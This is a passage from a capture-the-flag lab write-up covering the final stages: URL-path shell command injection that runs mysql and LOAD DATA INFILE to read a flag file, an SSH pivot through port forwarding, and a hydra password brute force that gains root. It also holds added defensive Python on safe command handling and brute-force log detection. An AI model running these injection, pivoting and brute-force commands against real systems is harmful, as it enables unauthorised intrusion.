The credentials to access to King's Landing are:
user/pass: cerseilannister/_g0dsHaveNoMercy_
db: kingslanding

"Chaos isn't a pit. Chaos is a ladder" - Petyr (Littlefinger) Baelish
': File name too long
```
  • This gives a username, a password and a database name.

Visit:

```text
http://192.168.123.154:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.123.154 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="SELECT * from iron_throne;" `
```
  • We get Morse code: -..-. . - -.-. -..-. -- -.-- ... --.- .-.. -..-. ..-. .-.. .- --.
    Decoded: /ETC/MYSQL/FLAG

The file cannot be read directly, so load it into a new table and read that instead.

```text
http://192.168.123.154:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.123.154 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="CREATE TABLE test (flag TEXT);" `
http://192.168.123.154:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.123.154 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="LOAD data INFILE '/etc/mysql/flag' INTO TABLE test;" `
http://192.168.123.154:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.123.154 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="select * from test;" `
```
  • Flag obtained:
```text
Congratulations. You conquered the last kingdom flag.
This is your flag: c8d46d341bea4fd5bff866a65ff8aea9
Now you must find the Dragonglass mine to forge stronger weapons.
Ssh user-pass:
daenerystargaryen-.Dracarys4thewin.
"All men must die, but we are not men" - Daenerys Stormborn of the House Targaryen, First of Her Name, the Unburnt, Queen of the Andals and the First Men, Khaleesi of the Great Grass Sea, Breaker of Chains, and Mother of Dragons': File name too long
```

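The Casterly Rock step above works because the requested path ends up inside a shell command string, so the quotes and backticks in the URL are interpreted by the shell instead of being treated as part of a file name. The Python below is an added example, not the CTF service's own code (the post does not show that implementation; the vulnerable pattern is my assumed reconstruction), contrasting that pattern with a safe one: an allow-list for path segments, an argv list handed to subprocess without a shell, and shlex.quote for the cases where a shell string cannot be avoided. INJECTED reproduces the shape of the path used above; the function names are my own.

```python
import re
import shlex
import subprocess

# One path segment: letters, digits, dot, underscore, dash. Nothing else.
SAFE_SEGMENT = re.compile(r"[A-Za-z0-9._-]+")

# Shape of the path used in the writeup's URL, reproduced here as a test value.
INJECTED = '"" `cat /home/tyrionlannister/checkpoint.txt`'


def vulnerable_command(repo_path: str) -> str:
    """Assumed reconstruction of the weak pattern: the request path is pasted into
    a shell command string. Run with shell=True, quotes and backticks are live."""
    return f'cat "{repo_path}"'


def is_safe_repo_path(repo_path: str) -> bool:
    """Allow-list check: a relative path of plain segments, no '.'/'..', no metacharacters."""
    if not repo_path or repo_path.startswith("/"):
        return False
    return all(SAFE_SEGMENT.fullmatch(seg) is not None and seg not in (".", "..")
               for seg in repo_path.split("/"))


def safe_command(repo_path: str) -> list:
    """argv list for subprocess.run without a shell; the path is validated first."""
    if not is_safe_repo_path(repo_path):
        raise ValueError(f"rejected path: {repo_path!r}")
    return ["cat", "--", repo_path]          # "--" stops option parsing on odd names


def safe_shell_string(repo_path: str) -> str:
    """If a shell string is unavoidable, quote the value so the shell sees one word."""
    return "cat -- " + shlex.quote(repo_path)


def echo_literal(arg: str) -> str:
    """Show that an argv list hands the argument over verbatim: /bin/echo prints the
    backticks instead of a shell executing what stands between them."""
    return subprocess.run(["echo", arg], capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    print(vulnerable_command(INJECTED))      # the backticks are live in this string
    print(safe_shell_string(INJECTED))       # quoted: the shell would see one argument
    print(echo_literal("`id`"), end="")       # prints `id` literally
    print(safe_command("note_under_the_bed.md"))
```

The allow-list is the important part: quoting alone stops the shell from interpreting the value, but it does not stop `../` traversal to files outside the repository, which is why the path is validated before anything is executed.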
flag8

Log in over SSH with the information above.
Username: daenerystargaryen
Password: .Dracarys4thewin.

```bash
daenerystargaryen@192.168.123.154's password:
 __            _   _            ___
|  |   ___ ___| |_|_|___ ___   |  _|___ ___
|  |__| . | . | '_| |   | . |  |  _| . |  _|
|_____|___|___|_,_|_|_|_|_  |  |_| |___|_|
                        |___|
 ____                          _
|    \ ___ ___ ___ ___ ___ ___| |___ ___ ___
|  |  |  _| .'| . | . |   | . | | .'|_ -|_ -|
|____/|_| |__,|_  |___|_|_|_  |_|__,|___|___|
              |___|       |___|

daenerystargaryen@7kingdoms:~$ pwd
/home/daenerystargaryen
daenerystargaryen@7kingdoms:~$ ls
checkpoint.txt  digger.txt
daenerystargaryen@7kingdoms:~$ cat digger.txt
mackenzie
babyboo
root
mystuff
singapore
trevor
.....
rachelle
123456789123456
daenerystargaryen@7kingdoms:~$ uaname
-bash: uaname: command not found
daenerystargaryen@7kingdoms:~$ uname
Linux
daenerystargaryen@7kingdoms:~$ cat checkpoint.txt
"Dragonglass. Frozen fire, in the tongue of old Valyria. Small wonder it is anathema to these cold children of the Other" - The Red Woman Melisandre
"Large amounts of Dragonglass can be found on Dragonglass mine (172.25.0.2). The mine can be accessed only from here. We are very close... Fail2ban magic is not present there, maybe we can reach the 'root' of the problem pivoting from outside to use this digger" - Samwell Tarly
"The White Walkers don't care if a man's free folk or crow. We're all the same to them, meat for their army. But together we can beat them" - Jon Snow
```

The account is tightly restricted and privilege escalation is not possible, but the hint says Fail2ban is absent on the mine, reveals an IP that is reachable only from this host, and supplies a pile of passwords.
So what do we have to work with? First, SSH port forwarding; second, password brute forcing.

```bash
$ ssh -f daenerystargaryen@192.168.123.154-l 17891:172.25.0.2:22 -N
ssh: Could not resolve hostname 192.168.123.154-l: Name or service not known

# root @ Sec in /tmp [19:30:06] C:255
$ ssh -f daenerystargaryen@192.168.123.154 -L 17891:172.25.0.2:22 -N
daenerystargaryen@192.168.123.154's password:

# root @ Sec in /tmp [19:30:20]
$ hydra -l root -P digger.txt ssh://localhost:17891
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1001 login tries (l:1/p:1001), ~63 tries per task
[DATA] attacking ssh://localhost:17891/
[17891][ssh] host: localhost   login: root   password: Dr4g0nGl4ss!
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at
```

The brute force succeeded with the password Dr4g0nGl4ss!; log in to collect the flag.

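The hydra run only succeeded because, as the hint says, the Dragonglass container has no fail2ban: on the main host the same 1001 attempts would have earned a ban after a handful of failures. The Python below is an added example, not code from the original post, of the detection fail2ban's sshd jail performs. It parses "Failed password" lines from an auth log and reports every source address that reached maxretry failures inside a sliding findtime window, together with the moment a ban would have fired. SAMPLE_AUTH_LOG is constructed to resemble what the container's log would contain during such a run; the source address 172.25.0.1 and the 10.0.0.9 noise line are made up for the example, and the function names are my own.

```python
import re
from collections import defaultdict
from datetime import datetime

# sshd failure line in the classic syslog layout (year-less timestamp).
FAILED = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2"
)

# Constructed auth.log excerpt: a password-guessing burst against the mine
# container from 172.25.0.1 (made-up source), one success, one unrelated failure.
SAMPLE_AUTH_LOG = """\
Nov  5 19:30:21 1558d33076eb sshd[201]: Failed password for root from 172.25.0.1 port 40112 ssh2
Nov  5 19:30:21 1558d33076eb sshd[202]: Failed password for root from 172.25.0.1 port 40114 ssh2
Nov  5 19:30:22 1558d33076eb sshd[203]: Failed password for root from 172.25.0.1 port 40116 ssh2
Nov  5 19:30:22 1558d33076eb sshd[204]: Failed password for root from 172.25.0.1 port 40118 ssh2
Nov  5 19:30:23 1558d33076eb sshd[205]: Failed password for root from 172.25.0.1 port 40120 ssh2
Nov  5 19:30:23 1558d33076eb sshd[206]: Failed password for root from 172.25.0.1 port 40122 ssh2
Nov  5 19:30:24 1558d33076eb sshd[207]: Accepted password for root from 172.25.0.1 port 40124 ssh2
Nov  5 19:31:02 1558d33076eb sshd[208]: Failed password for invalid user admin from 10.0.0.9 port 51000 ssh2
""".splitlines()


def parse_failures(lines):
    """Return (timestamp, source ip, user) for every failed-password line."""
    events = []
    for line in lines:
        m = FAILED.match(line)
        if not m:
            continue
        month, day, clock = m.group("ts").split()
        ts = datetime.strptime(f"{month} {day} {clock}", "%b %d %H:%M:%S")
        events.append((ts, m.group("ip"), m.group("user")))
    return events


def bruteforce_sources(lines, maxretry=5, findtime_seconds=600):
    """Source IPs with at least maxretry failures inside any findtime window.

    This is the rule fail2ban's sshd jail enforces through its maxretry and
    findtime settings; the value is the timestamp at which a ban would trigger.
    """
    per_ip = defaultdict(list)
    for ts, ip, _user in parse_failures(lines):
        per_ip[ip].append(ts)
    offenders = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start = 0                                  # left edge of the sliding window
        for end, ts in enumerate(stamps):
            while (ts - stamps[start]).total_seconds() > findtime_seconds:
                start += 1                         # drop failures older than findtime
            if end - start + 1 >= maxretry:
                offenders[ip] = ts
                break
    return offenders


if __name__ == "__main__":
    for ip, when in bruteforce_sources(SAMPLE_AUTH_LOG).items():
        print(f"ban {ip} (threshold reached at {when:%H:%M:%S})")
```

Note what the detector does not see: the successful "Accepted password" line is ignored, so a host that bans on failures alone still needs a separate alert on a success that follows a burst of failures, which is exactly the sequence the hydra run above produces.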
```bash
$ ssh root@localhost -p 17891
The authenticity of host '[localhost]:17891 ([::1]:17891)' can't be established.
ECDSA key fingerprint is SHA256:CLkjibFJaJn7gL10+IfE7LWYVS34ZgavwWKn+ej4LaU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:17891' (ECDSA) to the list of known hosts.
root@localhost's password:

You found the
 ____                          _
|    \ ___ ___ ___ ___ ___ ___| |___ ___ ___
|  |  |  _| .'| . | . |   | . | | .'|_ -|_ -|
|____/|_| |__,|_  |___|_|_|_  |_|__,|___|___|
              |___|       |___|
       _
 _____|_|___ ___
|     | |   | -_|
|_|_|_|_|_|_|___|

root@1558d33076eb:~# ls
flag.txt
root@1558d33076eb:~# cat flag.txt
Congratulations.
You've found the secret flag of Dragonglass mine. This is your flag: a8db1d82db78ed452ba0882fb9554fc9

Now you have the Dragonglass weapons to fight against the White Walkers.

Host's ssh:
branstark/Th3_Thr33_Ey3d_Raven

"The time has come" - The Three Eyed Raven
```

Takeaways

This environment is very hands-on; many of its scenarios feel like real-world cases, and the encoding and decryption steps cost me a lot of time.


Author: IceKam (self-styled tea-tasting expert, low-end typist).